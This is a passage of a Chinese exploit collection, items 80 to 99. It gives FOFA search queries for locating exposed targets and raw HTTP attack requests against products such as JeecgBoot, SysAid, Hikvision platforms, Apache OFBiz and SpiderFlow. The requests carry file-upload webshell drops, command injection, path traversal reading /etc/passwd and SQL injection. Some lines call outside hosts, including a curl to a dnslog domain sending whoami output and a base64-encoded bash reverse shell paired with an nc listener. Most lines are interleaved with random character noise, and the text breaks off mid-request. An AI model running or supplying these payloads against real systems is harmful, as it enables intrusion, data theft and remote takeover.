User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
* u$ W- B& M: J' H8 N) WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" m. v. {9 q- [2 E' `; @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 k" Y- a5 d' M2 Q( G( ]
Accept-Encoding: gzip, deflate" \0 N) U+ f9 U* O/ F
Connection: close
" Z; Q( E2 N9 g4 x7 I6 tUpgrade-Insecure-Requests: 1
' n; B5 p/ c H' E$ Q9 y4 V
( O, `, l0 q" G! R, p
1 |) s* N* h2 u1 {9 O& X0 `# H80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
. Z, V- v( [; x- kFOFA:app="速达软件-公司产品"
- r5 i5 u# r$ v( k! Z# j4 XPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1$ ?/ p0 P( W& G5 h: b
Host: x.x.x.x
. w( M7 n6 B: p* E6 XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 h% B; f- u4 A& X2 N* [Content-Length: 27 S& v, |, A! o; @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% b$ m$ [! M$ @8 c* ^( XAccept-Encoding: gzip, deflate7 t- T8 A3 v- |6 d& o1 Q! R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
F% W6 D) V3 O* B' p0 t3 |/ L% H! @Connection: close3 d% k- A; \* z0 r3 D, D( U$ U
Content-Type: application/octet-stream
. f' n' W* P- x- S0 TUpgrade-Insecure-Requests: 1
" ~1 D- i8 ~! p$ S6 J& D
; [9 o" I4 u1 B0 J6 B Q; Y8 P/ U<% out.print("oessqeonylzaf");%>% ^+ ?$ n) p8 m9 |
: J/ r2 B/ L7 f: H6 @
# P6 |" L+ f- W' u; I- v
GET /xykqmfxpoas.jsp HTTP/1.1! K4 ^- ^" {+ p# R5 E- Z, h
Host: x.x.x.x" I- ^% _# m6 y M0 a8 N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# l$ m) f. Y. DConnection: close
! L1 _/ F( K* LAccept-Encoding: gzip `9 T- o4 u& l$ w; c( _/ q% ~
/ Q g, }1 ?% }* w6 @
( G2 O( g( v$ e2 x( L; u
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
& D/ C9 }; X$ ?" x) g/ qFOFA:app="uniview-视频监控"0 W" c0 T, w) Z% N0 P
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
7 |" H' C7 E7 l. G8 C% jHost: x.x.x.x
v3 j" \- K2 G+ jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ n$ Z4 J- q* \! m! g4 E3 n
Connection: close% ?# M; r! r1 _7 z
Accept-Encoding: gzip' E l, @. C y. V' ~* c* x
) e' H: N" S0 A, C; |+ p
# W3 o: X% V# ]9 Q5 X+ p82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
* y6 Y- P' E9 e( nFOFA:app="思福迪-LOGBASE"
# k- I! g& l. {- G6 j6 u4 YPOST /bhost/test_qrcode_b HTTP/1.1
, p* e" x& [( y% [Host: BaseURL
" Q: r3 y* a$ I! q. ]User-Agent: Go-http-client/1.1
/ z# ~0 h3 y1 n; |+ K' W0 mContent-Length: 23: ^& {) |1 I# ^( n! M
Accept-Encoding: gzip, ]" ~8 d7 \* O0 o
Connection: close$ ]4 A5 a: o$ E0 Q
Content-Type: application/x-www-form-urlencoded% C1 k# s& z/ i# o
Referer: BaseURL
1 @4 h# }% I6 T, C: Q# ~9 ]+ `0 a8 n! j7 |
z1=1&z2="|id;"&z3=bhost
) v/ R! y% n- m0 x
- \: T- {) q; `
$ k, L, g9 } f83. JeecgBoot testConnection 远程命令执行( a3 b5 }% P$ P( ?0 c1 n+ X
FOFA:title=="JeecgBoot 企业级低代码平台"
9 h7 o# x$ @9 r2 J l5 T" e' I( e) S! x8 G0 B+ z* i9 ~
9 U" ^) b9 c0 {* j+ JPOST /jmreport/testConnection HTTP/1.1
' I8 ]) Y& Y) e# `Host: x.x.x.x
. @2 |. v) P9 u+ [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( |' l S3 D1 i$ k- pConnection: close# R7 w$ x- N! H# Z5 j/ n4 B
Content-Length: 8881& p! |/ h% Z. b5 V# k
Accept-Encoding: gzip) `( U! ]* |' g' w6 }5 i4 ?
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
! y9 l. U2 e5 QContent-Type: application/json
2 ^; p2 S1 s6 b; o0 J9 Q, J; a+ I% Z- u: g( |' \
PAYLOAD% w7 x6 o2 f$ J! }2 E, z
$ w! V: _# _/ @) ^9 K' \
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
! h M( O0 V0 X6 j5 n! v& hFOFA:title=="JeecgBoot 企业级低代码平台") _ z0 N. Y" ^# k! h( n
- s1 h# ?0 C5 i5 j. _, b
6 G: C3 a8 X* \3 S* f; ^$ U
~: V5 n: a& A7 H; K' {
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
1 j6 a% D2 b0 O! BHost: 192.168.40.130:8080% J; g! G& c) c& U0 O
User-Agent: curl/7.88.1
) a% h |0 c) _1 C7 s5 f! wContent-Length: 156
9 M' H7 M: K. T4 o" c' e0 F# ZAccept: */** B- o5 C! ?: T$ ^# r, w0 X
Connection: close
$ s, f; I5 X, ]' _; J n+ vContent-Type: application/json' F% j# K2 R4 {& I8 O$ e- r
Accept-Encoding: gzip# p4 c% U% Z: r4 g1 s" [2 c1 e
) { E% S$ i) r: u
{
/ \9 S* ?' W5 |( @: U "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",8 u3 T; r x0 K& A$ i
"type": "0"
: q+ z6 l8 D: i: z4 L}
' P; Y' a, d4 H: ]! H! C5 |4 s2 n) k- I( u* k1 C; H% {) K0 {
, I7 a* `: r% ` M4 o r85. SysAid On-premise< 23.3.36远程代码执行
+ v8 I. B+ d, {% P1 E" j& \/ sCVE-2023-47246" ] N8 J6 G" ?0 Q T$ ?
FOFA:body="sysaid-logo-dark-green.png" # x* D; M9 V$ g2 G) ]
EXP数据包如下,注入哥斯拉马) ~+ J6 e) b6 C0 f4 p/ W4 O" n2 f
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
1 x5 M+ [; V3 X, M0 @Host: x.x.x.x
; e: v1 d8 u. {$ o; ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. Z5 d& ~ N6 u4 o0 [+ ~Content-Type: application/octet-stream& p8 `7 R6 R5 b% D; H
Accept-Encoding: gzip
; |% v9 ]. r% D! r! v4 i- b& }& L
. c" W4 Q& T2 G: W7 ^, o* VPAYLOAD. `% e: l) T2 k" r
6 _9 c, Q- r/ W2 N2 _
回显URL:http://x.x.x.x/userfiles/index.jsp. q. f- F$ F" { k
$ z; N2 K! Y; i7 G* E2 j! Y+ u4 Z86. 日本tosei自助洗衣机RCE
& B4 D5 M0 S: K9 }, ]# v4 e. fFOFA:body="tosei_login_check.php"' v* P& c) B7 l; m+ C- n& i
POST /cgi-bin/network_test.php HTTP/1.1
1 ?8 e2 {, ]: Z$ l: LHost: x.x.x.x3 X1 r! X7 ?* x3 l* H5 D7 N! R
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36, u2 n9 c5 N6 h; \6 E% }
Connection: close& P5 C4 f- X& B9 C1 e! H
Content-Length: 44/ Y D) M$ _. S% A N- k
Accept: */*/ ]. y+ K. G0 r/ V
Accept-Encoding: gzip) r+ H; w! [* Q* ]
Accept-Language: en
- |+ ]! |9 W8 B' J' QContent-Type: application/x-www-form-urlencoded
! R4 H0 @/ [, c$ |0 n2 A, ]$ H/ A
" Y" x1 o ]! O" }6 D, fhost=%0acat${IFS}/etc/passwd%0a&command=ping: P9 Q3 F) G& T9 W0 }" t; h _
' F7 r, ^ ` F9 j! A! t @- U: b0 Z/ Q, ~8 n
87. 安恒明御安全网关aaa_local_web_preview文件上传) X6 o5 H0 B$ J
FOFA:title="明御安全网关", F" l& a& C" ]1 u1 M
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
0 W- ]7 w$ I! K- XHost: X.X.X.X
+ S# D4 p- e/ V6 P4 O+ QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' N3 U9 U) w3 U: V3 m
Connection: close4 l) f: G7 {' L( r3 Y
Content-Length: 1987 V& b, z5 t0 }
Accept-Encoding: gzip
* ?8 C% q$ E" o" Z1 c* o; E" VContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
7 d/ F1 n* [+ o; f* Q& ~6 C3 ^9 _/ ` E6 n; l
--qqobiandqgawlxodfiisporjwravxtvd
$ A+ \# [1 x6 K& U RContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"! p& K& i9 S, J9 U, N* k
Content-Type: text/plain
- U) L6 b6 s4 m* {
, D5 Y7 x$ e! s3 v( p3 [2ZqGNnsjzzU2GBBPyd8AIA7QlDq
1 V% R' s6 b, F: W$ C--qqobiandqgawlxodfiisporjwravxtvd--
6 U, B, I N" f$ u* b- q- S- I. W; n2 u
8 k7 j/ x' b/ q( S0 `1 ] ]
/jfhatuwe.php
+ q7 N2 c3 p' C' C" O6 c+ Y! c1 u, m1 L
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
$ s0 i% |# N' W- W2 j- \) |- _FOFA:title="明御安全网关"
8 i( k% e+ q* ]4 m8 tGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1& W1 ^5 U; Q: I
Host: x.x.x.xx.x.x.x) E8 e m* c: v7 w" s; E* b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' S, s1 E$ B; s- CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ Y7 Q8 b1 V: z( i% ^, f: f0 U
Accept-Encoding: gzip, deflate+ V- J! v6 m) X2 O( q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 H/ e% O) I) E2 W9 `, C' r
Connection: close
# V- b' t6 s0 W" V! F" ^% \
$ D9 ~0 i+ G; W6 _9 T. ]7 W0 j) k3 M8 _$ z: @
/astdfkhl.php
* M- B) C. i' X) D! S+ e7 P4 m z! J& J8 N' R ]: c
89. 致远互联FE协作办公平台editflow_manager存在sql注入0 |. z; Q* ^, v2 X5 m
FOFA:title="FE协作办公平台" || body="li_plugins_download": O# H7 C. n8 [1 v
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
& V* Q8 O4 r3 o" w$ i+ z# k( r; N% JHost: x.x.x.x
4 H' B4 n; l# P$ pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& S, B0 I& Y# V7 M* JConnection: close. X! c( h* p3 U W5 T7 W
Content-Length: 41
6 E( L- b2 x) Y9 Q0 u- MContent-Type: application/x-www-form-urlencoded
1 L' v' u, B& Z, ? I. Y4 ~* |Accept-Encoding: gzip
9 V2 Z! M; z2 g9 `) s
: b% A7 }3 ~5 Z- T, k+ poption=2&GUID=-1'+union+select+111*222--+7 l: X0 W, _' k: t5 l7 C6 j
( b' @8 C+ w' H# g: O. C+ v: O1 b, p
' S9 O. @; x3 @% y( ^* D90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
# g: G( |5 F0 S0 V7 E" |FOFA:icon_hash="-1830859634"
' j- [, w- m! L7 IPOST /php/ping.php HTTP/1.1
5 J, b/ b1 `: Y) l% Z0 Y1 uHost: x.x.x.x
3 R# |5 S6 F8 c" WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
' G9 ?- b- q7 y, w4 Q0 | \Content-Length: 510 }4 O; o" \1 `( `5 Q' ~
Accept: application/json, text/javascript, */*; q=0.01
. I7 i5 |* U w* C, zAccept-Encoding: gzip, deflate
, X; @8 M6 a( c% k/ o! \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 u/ L( ~, _3 m+ s1 j" R! G+ @3 E# s
Connection: close
; q& d* O* F! jContent-Type: application/x-www-form-urlencoded1 B' g8 t# O, A4 w& f7 k! I5 a
X-Requested-With: XMLHttpRequest# Z! y# g2 v; y1 H7 y; C1 n
% f3 S) L$ }' x* }! P5 ujsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig) o2 P, h- L* Y; d9 N
" H% a1 j% S \, o
& j+ }& l( q/ L% Y4 U91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取9 c' {+ d2 a! C: f7 D
FOFA:title="综合安防管理平台") W- s4 R8 q) s5 s) }- s8 ^
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
2 G! x8 Y, i, M* GHost: your-ip
7 J' K, I! Y! q5 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
0 _* a* |3 y1 E6 G6 h& DAccept-Encoding: gzip, deflate
+ n/ j* \6 T+ Y2 D8 xAccept: */*
2 a8 D+ s H2 k9 c" ]* LConnection: keep-alive$ w, f# z2 z8 R
. Y5 W1 K U3 W- G' N% e; ?6 K
- q5 I& V' d4 j( c$ h3 i1 G
/ j. {4 y0 C7 m2 a92. 海康威视运行管理中心session命令执行' z8 r! r9 f8 o5 S8 m
Fastjson命令执行& z1 M* x: W( N! T, ?6 Q
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
# a2 v/ {1 C' [# N0 D# p1 RPOST /center/api/session HTTP/1.1* [" T( o! p* F: H4 x) \% k
Host:& v" Z" n; r! o& p) P" L
Accept: application/json, text/plain, */*4 E% G, L5 ?. A& o& [
Accept-Encoding: gzip, deflate
, r4 U8 E: s- FX-Requested-With: XMLHttpRequest
, f3 E" z8 w& _0 a6 `4 SContent-Type: application/json;charset=UTF-89 [( I3 ]7 N% y
X-Language-Type: zh_CN
$ X1 m% i7 U! a4 H' R3 uTestcmd: echo test6 s$ r: K0 U7 s5 G) p9 e! Y( ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.364 f1 i, D( i3 S ]
Accept-Language: zh-CN,zh;q=0.9/ ^ C Y0 S. ]6 o8 Y
Content-Length: 5778
! S+ D) O, \" N% A
; g& T7 K1 B$ TPAYLOAD" S3 }8 j# s2 y& k; n! o
6 J- T0 T8 m; w* R5 h# @1 P2 ~) e3 x3 d' T; q. O
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
! ^1 }; ^% z7 Q) EFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
5 `# r9 ^: Q2 z: gPOST /?g=app_av_import_save HTTP/1.1
8 n# ]0 q( N. H, V2 v5 H+ Q1 lHost: x.x.x.x
( ~( L, t8 w1 {* }" r' D) K& o4 F/ t9 _0 GContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
9 o/ ^; ? i7 ?: j2 ]User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
9 W; N3 c/ i+ y2 }" Z: e5 R/ |7 Y8 w1 g
------WebKitFormBoundarykcbkgdfx7 Y0 { g* h2 u- g: `, Y3 ^- i
Content-Disposition: form-data; name="MAX_FILE_SIZE"
. o/ D+ M# _6 t& z% w
" \+ B% Z5 c6 ^7 a+ v. F9 D5 V( A10000000
3 w; k) t6 n" X p------WebKitFormBoundarykcbkgdfx8 W- e y2 C3 t! s0 A, L
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"# D/ L4 B- A% ?- a3 H9 u
Content-Type: text/plain% P1 B; O, _8 G
+ `4 ^. n# g6 [+ S
wagletqrkwrddkthtulxsqrphulnknxa
: g- T8 R" k c/ B4 @/ j------WebKitFormBoundarykcbkgdfx, o% z* @& o( C
Content-Disposition: form-data; name="submit_post"& ?4 I" q3 B* s( W8 T
( O' J# W5 E; s
obj_app_upfile
" M, v! t- H3 }------WebKitFormBoundarykcbkgdfx6 W5 y" p2 W/ }) m' O
Content-Disposition: form-data; name="__hash__"
9 {& u" b# d& Q. E, y. q; d, Y
% {! c$ v% d6 ~0b9d6b1ab7479ab69d9f71b05e0e9445* E4 D* Q; C' M* [1 v, R7 L2 O
------WebKitFormBoundarykcbkgdfx--
2 V0 H& e4 J9 Y' ]# W7 i7 `: _( w$ M# q% ?0 n
" l# v: F1 t$ \
GET /attachements/xlskxknxa.txt HTTP/1.1
. Z; C/ U" K) |6 W: QHost: xx.xx.xx.xx1 q+ R2 b; D8 Z# A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
8 {2 }. Y& H7 ^4 e6 B) X8 L6 ~/ s
. F; ^. o+ ?' i( ^' {
5 m5 q8 x* X& n. ^; }94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传) M2 w1 s4 c; R! t1 H- }; m
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="1 p0 p6 H+ N5 Y3 f* _# w
POST /?g=obj_area_import_save HTTP/1.1
" E# J, d7 }0 [. {8 kHost: x.x.x.x6 i0 k& r) N0 O3 a3 ]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
8 Y9 ?$ d+ ~: e5 |9 x; j% ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36+ K3 s. ~) m# p1 _- n0 q4 _
$ o9 v m' m! G------WebKitFormBoundarybqvzqvmt/ P* q- A5 P( k+ q9 u0 R
Content-Disposition: form-data; name="MAX_FILE_SIZE"
* m+ I4 n6 F$ D! k# @5 r( J" V X% t& W9 H# A; o: _# ~
10000000+ G* ~; I9 P4 h/ y* _2 u( d
------WebKitFormBoundarybqvzqvmt$ C: n9 N: [: V
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
/ {9 a, G/ }4 O- k- E gContent-Type: text/plain) g( d& P0 G* j. v
/ V3 r- a1 A+ j. C: O' w9 j% M
pxplitttsrjnyoafavcajwkvhxindhmu1 x8 T" D$ B1 X5 j& m( s
------WebKitFormBoundarybqvzqvmt* a- @% O; W" W
Content-Disposition: form-data; name="submit_post"
+ [7 _4 b* e& n/ q: U! Y# u3 r: S0 U9 d/ @
obj_app_upfile
# G8 S: [, r9 `$ ]------WebKitFormBoundarybqvzqvmt
1 f+ z" ]: m" ]& yContent-Disposition: form-data; name="__hash__"
) g, E8 m$ h/ A; }
9 c" `6 c% a9 v3 a+ O0b9d6b1ab7479ab69d9f71b05e0e9445
2 L; M' q- H! m------WebKitFormBoundarybqvzqvmt--
4 K# B2 k/ L8 O% o" h9 g& `, j5 ?" v& ]
! b4 I) [- x+ n3 N7 C
( {6 t; f; @9 ?. w( j3 b" t& g i, G
GET /attachements/xlskxknxa.txt HTTP/1.19 `! {* G6 ^( i0 n
Host: xx.xx.xx.xx
3 G7 G- ]( D, Q6 W9 q* T' IUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.360 b- G) j. z& v5 B; z
. x. \& H. A. L& t8 W# U/ Q
& h4 P; \) H( ?- v: ]2 z
6 s: \* ~: V$ P4 Z95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
# g) S% }9 e' l& Y% B% c3 xCVE-2023-49070" v5 Y7 g5 Q' i j4 Y
FOFA:app="Apache_OFBiz"9 @0 {' ^& P* r6 o) |
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
* ~+ U! {; @; ^5 N+ xHost: x.x.x.x
6 S# g8 `+ X( f. k. e5 QUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
8 K$ B2 N, p7 b1 EConnection: close
3 h- G) p# }. ]* w9 F& zContent-Length: 889
; S& y% T; [+ N# ^7 y& GContent-Type: application/xml2 V% O* |2 T; m( i- q& O
Accept-Encoding: gzip7 ^ {) \ u6 d: L/ x( l
: v' s! c: i" O/ B. a" E: {5 }
<?xml version="1.0"?>! q L+ u/ z" ]. ?2 ]
<methodCall>3 q0 ?( `$ M4 e; s8 Y
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>" k% M; z' ~7 x4 {$ q& v$ [) W
<params>
/ v n7 V) @7 h. O- ^5 X <param>
; w) p# }, K9 I" v2 k! z. p <value>5 \5 j9 z" }7 M) z4 j
<struct>
* z" q% l' w; L" q B" G! X <member>" a" ~. F y1 ?$ I. k$ }3 x% y
<name>test</name>1 f; G9 i: u+ {6 i5 x7 y
<value>0 c4 \6 c- i$ p3 q$ |
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>! { O* A% Q. {2 F: \9 C" i" G+ j
</value>3 _2 i* s) r2 A
</member>
" e3 o0 x* o4 [ </struct>
, w( U" i9 ?9 f: R2 b0 ]+ T </value>. D/ G! K% m5 \" _* g
</param>0 d% R& W |; U4 i
</params>. D3 @* p7 p, e( k! x9 v8 D9 L
</methodCall>
0 t. f) p: i, I2 q- I4 N# \2 Y4 @4 Y( p! b3 p
) S7 ?2 Y; C( K* f6 l |
用ysoserial生成payload
- e$ N: d6 u$ C, pjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"' \5 t) h2 J, e2 X2 _6 `
# S+ @" h: T- V' z9 ], L
* j4 t( H7 U) E+ c5 X; F将生成的payload替换到上面的POC. @% H- ]& }# F) X1 W6 A
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
1 F# D" w5 _/ x7 p) l+ S% H; mHost: 192.168.40.130:8443
( a/ B P2 O4 oUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
* D. z0 C% d" E$ F6 VConnection: close' q: N$ h8 Z* A- M9 j! K
Content-Length: 889& Q: _7 h1 `9 @8 W2 _! h
Content-Type: application/xml
0 U" ]+ U. i4 D2 D: w. Q6 B" v' xAccept-Encoding: gzip4 d8 d/ b' U$ ?+ C: { t( D" u, _
: r; y& m S L M1 o+ w% BPAYLOAD
4 w+ t6 t+ L. z% B% L% q, b2 X9 j4 L& d; ~& d+ s, `$ g+ s" K
96. Apache OFBiz 18.12.11 groovy 远程代码执行
3 Q2 x) ~4 L6 `# BFOFA:app="Apache_OFBiz"
0 d1 l2 b! r4 I+ e$ ^8 `/ V. UPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
; _$ Q* z% i0 r. tHost: localhost:8443
' w7 L) U3 }+ Y6 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+ [% ]( o6 q8 U" _Accept: */*& _# p& W9 s1 p( ^1 R6 q& y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
`% w% Y3 X; }+ ?% CContent-Type: application/x-www-form-urlencoded
, h6 c# l. V5 K! G* B* y/ t# M5 AContent-Length: 552 H. S: m: p" H* C" X/ k/ x3 M# J
5 h/ L' f* R; g8 R* h( [1 E! NgroovyProgram=throw+new+Exception('id'.execute().text);
! l; F% [ v, T t n
' [" P* n( Q8 F1 {& R5 V6 y+ h1 W0 \! S/ w' w/ r
反弹shell' x5 C( U3 R' K2 Z0 x
在kali上启动一个监听
0 J3 d- X: ~1 h% {nc -lvp 7777
; G4 G3 N$ S: N- e I6 \& A$ v) F2 {* |0 F" m' Z. F. N
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
( ^- u* d8 E; s0 Q9 D& zHost: 192.168.40.130:8443
, x9 z+ S" o) i; L: X; r& IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
( q* N ?! U1 u2 g) l7 s7 I6 zAccept: */*3 `8 [; a. W$ |) Z+ M) k1 x7 Q: o" c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 ~/ y9 `# q- I6 Q7 }: x5 p4 V+ NContent-Type: application/x-www-form-urlencoded+ z! K" {6 ^! p. g, r
Content-Length: 71# w3 [' w/ U M5 J b( v
$ J5 t: E4 w6 v! G. j
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();* l1 w, U1 l; x; _: a) \
% c/ W1 w% O- t) q1 ]97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行, U& r$ q; P2 x' ?) u
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
. v" k8 B1 M: a1 [GET /passport/login/ HTTP/1.1
+ Z: Y# a$ [" X3 D2 pHost: 192.168.40.130:80852 A5 b+ _* D$ m+ d# @3 |- X! a8 }/ B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) O. Y0 l0 k; W, qAccept-Encoding: gzip
$ ]6 v4 K X- G, }Connection: close/ s8 R3 p7 q- m* H8 o7 ]
Cookie: rememberMe=PAYLOAD' d9 B$ E; J) I7 s/ X
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
- Z# c$ S5 G$ g0 T, y% O5 }$ M/ b# R: w
5 K( @1 K+ h0 |& D
98. SpiderFlow爬虫平台远程命令执行
* k( G) i1 k$ W3 F) ] ]CVE-2024-01955 |4 k. R! p" p! c. m3 }, ^% [4 [- p
FOFA:app="SpiderFlow"
5 [6 W- s) Y7 CPOST /function/save HTTP/1.1% G! R& U8 P* _6 N. t* D
Host: 192.168.40.130:8088% a/ c% ?" [0 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' O# F" b/ A& W4 E# @
Connection: close( i2 L' e( `, z
Content-Length: 121
) m6 P; W0 z0 VAccept: */*& h" f7 x2 X7 D; y4 D$ ?1 q% R' ^
Accept-Encoding: gzip, deflate! K* b/ E" S7 p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 g. K2 x6 Q4 r2 r
Content-Type: application/x-www-form-urlencoded; charset=UTF-8, z; t; |9 b1 }, I. w
X-Requested-With: XMLHttpRequest
6 i2 A3 m. ^& s. U
2 Y! |1 y$ M# @# }id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
. o6 s) c) ?" h+ Z0 E4 ~0 {' {- l7 i6 i4 n" T
; B. x# O# W" A' K* s4 ^' }% V- G
99. Ncast盈可视高清智能录播系统busiFacade RCE: ^% m# R, c: T6 [- E+ @8 S
CVE-2024-0305
% a7 z: i) }0 ~; QFOFA:app="Ncast-产品" && title=="高清智能录播系统" l0 a2 o l( U4 y4 `4 K3 n, ^
POST /classes/common/busiFacade.php HTTP/1.1, D1 N" F# g6 f1 F8 x
Host: 192.168.40.130:8080 i1 ?7 W& f9 N% ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0. H; Y) Q5 O/ I6 j$ M/ i x1 j
